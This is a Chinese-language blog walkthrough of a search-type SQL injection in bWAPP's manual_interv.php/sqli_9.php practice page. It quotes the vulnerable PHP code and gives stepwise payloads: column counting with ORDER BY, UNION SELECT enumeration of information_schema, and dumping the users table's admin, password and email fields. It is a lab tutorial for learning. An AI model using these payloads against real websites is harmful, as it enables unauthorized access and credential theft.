SQL注入之bWAPP之manual_interv.php

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入之bWAPP之manual_interv.php相关的知识,希望对你有一定的参考价值。

1、输入验证码,多想也没用。
技术分享图片
技术分享图片
然后跳转到
技术分享图片
技术分享图片
熟悉的注入页面。猜想验证码的作用应该就是起到一个登陆验证的作用,查看“manual_interv.php”,代码如下:

if(isset($_POST["form"]) && isset($_SESSION["captcha"]))
{

    if($_POST["captcha_user"] == $_SESSION["captcha"])
    {

        $_SESSION["manual_interv"] = 1;

        header("Location: sqli_9.php");

        exit;

    }

    else
    {

        $message = "<font color=\"red\">Incorrect CAPTCHA!</font>";

    }

}

判断验证码,并跳转到“sqli_9.php”。
下面是搜索型SQL的代码:
$sql = "SELECT * FROM movies WHERE title LIKE ‘%" . sqli($title) . "%‘";
之前忘了说,搜索型注入为什么输入“1%‘and‘%‘=‘”会是正常的不报错的,因为“1%‘”这里的百分号和单引号(%‘),闭合了代码中“LIKE ‘%”,二“and‘%‘=‘”这里的(‘%‘=‘)是为了闭合代码最后面的“%‘";”;注入进去就变成了“SELECT * FROM movies WHERE title LIKE ‘%" 1%‘and‘%‘=‘ "%‘”,意思就是搜索“1”,后面的“‘%’=‘%’”成了一个为真的判断。输入“1%‘查询语句+--+”,是闭合前面的搜索查询,并调用我们注入的查询语句,然后注释掉后面的内容。
下面接着讲这次的SQL注入。
2、输入个单引号进行判断。
技术分享图片
报错又有“%”,果断尝试搜索型注入。输入“title=1%‘and‘%‘=‘”,结果如图:
技术分享图片
3、判断字段数:
输入“title=1%‘order by 7 --+”正常,输入“title=1%‘order by 8 --+”报错,结果如图:
技术分享图片
技术分享图片
所以字段数为7。
4、查看显示位:
输入“title=1%‘union select 1,2,3,4,5,6,7 --+”,结果如图:
技术分享图片
5、查询数据库等信息:
输入“title=1%‘union select 1,database(),version(),4,user(),6,7 --+”,查询数据库名为bwapp、数据库版本为5.5.53、当前用户为[email protected],结果如图:
技术分享图片
6、查询表名:
输入“title=1%‘union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘--+”,发现users表较为重要,结果如图:
技术分享图片
7、查询字段名:
输入“title=1%‘union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘users‘--+”,发现较重要的字段有admin、password、email,结果如图:
技术分享图片
8、查询字段内容:
输入“title=1%‘union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users --+”,结果如图:
技术分享图片

以上是关于SQL注入之bWAPP之manual_interv.php的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入之bWAPP之sqli_1.php

SQL注入之bWAPP之sqli_6.php

SQL注入之bWAPP之sqli_16.php

SQL注入之bWAPP之sqli_13.php

SQL注入之bWAPP之sqli_10-1.php

SQL注入之bWAPP之sqli_11.php